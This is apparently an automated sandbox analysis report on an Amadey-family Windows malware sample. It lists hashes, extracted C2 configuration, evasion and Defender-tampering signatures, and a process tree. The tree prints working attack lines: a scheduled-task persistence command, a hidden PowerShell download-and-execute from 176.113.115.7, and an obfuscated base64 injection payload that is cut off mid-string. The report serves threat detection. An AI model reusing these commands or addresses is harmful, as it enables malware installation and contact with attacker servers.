Analysis
-
max time kernel
56s -
max time network
86s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
30/03/2025, 13:42
Static task
static1
Behavioral task
behavioral1
Sample
2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
0e4ac18b2224b5d46bfb6a68417a0104
-
SHA1
38922c092ce214d8f87586f7ed13d68814a95057
-
SHA256
31bd1ef59c8715bdd8a5bf2e8231e43f9156d1b71901061b552dbbd37550960a
-
SHA512
6ffa7135c8a61329be36dbfca51c8f74b75e8ab8596d8407c1ea628f27b8b9a3e862ffdcfb1de40379b91ca33109bc0f2b9b57cffe3735649f9c8b86796e8629
-
SSDEEP
24576:/qDEvCTbMWu7rQYlBQcBiT6rprG8a0ou:/TvC/MTQYxsWR7a0o
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Signatures
-
Amadey family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempI3RCWTU31XKIBND4OHZ8ORATP9EH0RRA.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 4 2164 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2068 powershell.exe 2164 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 2 IoCs
flow pid Process 8 2496 rapes.exe 4 2164 powershell.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 1228 takeown.exe 1848 icacls.exe -
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempI3RCWTU31XKIBND4OHZ8ORATP9EH0RRA.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempI3RCWTU31XKIBND4OHZ8ORATP9EH0RRA.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe -
Executes dropped EXE 6 IoCs
pid Process 2612 TempI3RCWTU31XKIBND4OHZ8ORATP9EH0RRA.EXE 2496 rapes.exe 2120 3a9b39d862.exe 980 221.exe 1700 221.exe 684 A9cowK5.exe -
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine TempI3RCWTU31XKIBND4OHZ8ORATP9EH0RRA.EXE Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine rapes.exe -
Loads dropped DLL 10 IoCs
pid Process 2164 powershell.exe 2164 powershell.exe 2612 TempI3RCWTU31XKIBND4OHZ8ORATP9EH0RRA.EXE 2612 TempI3RCWTU31XKIBND4OHZ8ORATP9EH0RRA.EXE 2496 rapes.exe 2120 3a9b39d862.exe 2120 3a9b39d862.exe 2120 3a9b39d862.exe 2120 3a9b39d862.exe 2496 rapes.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 1228 takeown.exe 1848 icacls.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2612 TempI3RCWTU31XKIBND4OHZ8ORATP9EH0RRA.EXE 2496 rapes.exe -
Drops file in Program Files directory 46 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MpAsDesc.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MsMpRes.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MpOAV.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MsMpLics.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MsMpLics.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MpClient.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpCmdRun.exe cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpOAV.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpClient.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MpSvc.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MsMpCom.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\en-US\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpAsDesc.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MpEvMsg.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MSASCui.exe cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpCommu.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MpRTP.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\en-US\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempI3RCWTU31XKIBND4OHZ8ORATP9EH0RRA.EXE -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2236 sc.exe 2840 sc.exe 1008 sc.exe 2056 sc.exe 2684 sc.exe 1592 sc.exe 3060 sc.exe 2968 sc.exe 2316 sc.exe 2656 sc.exe 1556 sc.exe 1756 sc.exe 2988 sc.exe 2788 sc.exe 2808 sc.exe 2448 sc.exe 2784 sc.exe 2984 sc.exe 2940 sc.exe 1560 sc.exe 3028 sc.exe 1616 sc.exe 3012 sc.exe 2772 sc.exe 2500 sc.exe 1900 sc.exe 1696 sc.exe 2620 sc.exe 2852 sc.exe 2720 sc.exe 2000 sc.exe 364 sc.exe 3044 sc.exe 1912 sc.exe 892 sc.exe 2860 sc.exe 2180 sc.exe 1716 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempI3RCWTU31XKIBND4OHZ8ORATP9EH0RRA.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3a9b39d862.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 221.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 221.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language A9cowK5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1508 timeout.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2300 schtasks.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1700 221.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2164 powershell.exe 2164 powershell.exe 2164 powershell.exe 2612 TempI3RCWTU31XKIBND4OHZ8ORATP9EH0RRA.EXE 2496 rapes.exe 2068 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 464 Process not Found 464 Process not Found -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2164 powershell.exe Token: SeDebugPrivilege 2068 powershell.exe Token: SeDebugPrivilege 684 A9cowK5.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 2876 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2876 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2876 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2612 TempI3RCWTU31XKIBND4OHZ8ORATP9EH0RRA.EXE -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 2876 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2876 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2876 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2876 wrote to memory of 2684 2876 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 30 PID 2876 wrote to memory of 2684 2876 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 30 PID 2876 wrote to memory of 2684 2876 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 30 PID 2876 wrote to memory of 2684 2876 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 30 PID 2876 wrote to memory of 1748 2876 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 31 PID 2876 wrote to memory of 1748 2876 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 31 PID 2876 wrote to memory of 1748 2876 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 31 PID 2876 wrote to memory of 1748 2876 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 31 PID 2684 wrote to memory of 2300 2684 cmd.exe 33 PID 2684 wrote to memory of 2300 2684 cmd.exe 33 PID 2684 wrote to memory of 2300 2684 cmd.exe 33 PID 2684 wrote to memory of 2300 2684 cmd.exe 33 PID 1748 wrote to memory of 2164 1748 mshta.exe 34 PID 1748 wrote to memory of 2164 1748 mshta.exe 34 PID 1748 wrote to memory of 2164 1748 mshta.exe 34 PID 1748 wrote to memory of 2164 1748 mshta.exe 34 PID 2164 wrote to memory of 2612 2164 powershell.exe 36 PID 2164 wrote to memory of 2612 2164 powershell.exe 36 PID 2164 wrote to memory of 2612 2164 powershell.exe 36 PID 2164 wrote to memory of 2612 2164 powershell.exe 36 PID 2612 wrote to memory of 2496 2612 TempI3RCWTU31XKIBND4OHZ8ORATP9EH0RRA.EXE 37 PID 2612 wrote to memory of 2496 2612 TempI3RCWTU31XKIBND4OHZ8ORATP9EH0RRA.EXE 37 PID 2612 wrote to memory of 2496 2612 TempI3RCWTU31XKIBND4OHZ8ORATP9EH0RRA.EXE 37 PID 2612 wrote to memory of 2496 2612 TempI3RCWTU31XKIBND4OHZ8ORATP9EH0RRA.EXE 37 PID 2496 wrote to memory of 600 2496 rapes.exe 39 PID 2496 wrote to memory of 600 2496 rapes.exe 39 PID 2496 wrote to memory of 600 2496 rapes.exe 39 PID 2496 wrote to memory of 600 2496 rapes.exe 39 PID 600 wrote to memory of 2468 600 cmd.exe 41 PID 600 wrote to memory of 2468 600 cmd.exe 41 PID 600 wrote to memory of 2468 600 cmd.exe 41 PID 600 wrote to memory of 2468 600 cmd.exe 41 PID 2468 wrote to memory of 2068 2468 cmd.exe 43 PID 2468 wrote to memory of 2068 2468 cmd.exe 43 PID 2468 wrote to memory of 2068 2468 cmd.exe 43 PID 2468 wrote to memory of 2068 2468 cmd.exe 43 PID 2496 wrote to memory of 2120 2496 rapes.exe 44 PID 2496 wrote to memory of 2120 2496 rapes.exe 44 PID 2496 wrote to memory of 2120 2496 rapes.exe 44 PID 2496 wrote to memory of 2120 2496 rapes.exe 44 PID 2120 wrote to memory of 980 2120 3a9b39d862.exe 45 PID 2120 wrote to memory of 980 2120 3a9b39d862.exe 45 PID 2120 wrote to memory of 980 2120 3a9b39d862.exe 45 PID 2120 wrote to memory of 980 2120 3a9b39d862.exe 45 PID 980 wrote to memory of 1724 980 221.exe 46 PID 980 wrote to memory of 1724 980 221.exe 46 PID 980 wrote to memory of 1724 980 221.exe 46 PID 980 wrote to memory of 1724 980 221.exe 46 PID 1724 wrote to memory of 1700 1724 cmd.exe 48 PID 1724 wrote to memory of 1700 1724 cmd.exe 48 PID 1724 wrote to memory of 1700 1724 cmd.exe 48 PID 1724 wrote to memory of 1700 1724 cmd.exe 48 PID 1700 wrote to memory of 2076 1700 221.exe 49 PID 1700 wrote to memory of 2076 1700 221.exe 49 PID 1700 wrote to memory of 2076 1700 221.exe 49 PID 1700 wrote to memory of 2076 1700 221.exe 49 PID 2076 wrote to memory of 1716 2076 cmd.exe 51 PID 2076 wrote to memory of 1716 2076 cmd.exe 51 PID 2076 wrote to memory of 1716 2076 cmd.exe 51 PID 2076 wrote to memory of 2236 2076 cmd.exe 52 PID 2076 wrote to memory of 2236 2076 cmd.exe 52 PID 2076 wrote to memory of 2236 2076 cmd.exe 52 PID 2076 wrote to memory of 1508 2076 cmd.exe 53 PID 2076 wrote to memory of 1508 2076 cmd.exe 53 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 2WNL6majC4c /tr "mshta C:\Users\Admin\AppData\Local\Temp\fI1GSlRq5.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 2WNL6majC4c /tr "mshta C:\Users\Admin\AppData\Local\Temp\fI1GSlRq5.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2300
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\fI1GSlRq5.hta2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1748 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'I3RCWTU31XKIBND4OHZ8ORATP9EH0RRA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2164 -
C:\Users\Admin\AppData\Local\TempI3RCWTU31XKIBND4OHZ8ORATP9EH0RRA.EXE"C:\Users\Admin\AppData\Local\TempI3RCWTU31XKIBND4OHZ8ORATP9EH0RRA.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2496 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10373951121\5YB5L4K.cmd"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:600 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10373951121\5YB5L4K.cmd"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2468 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3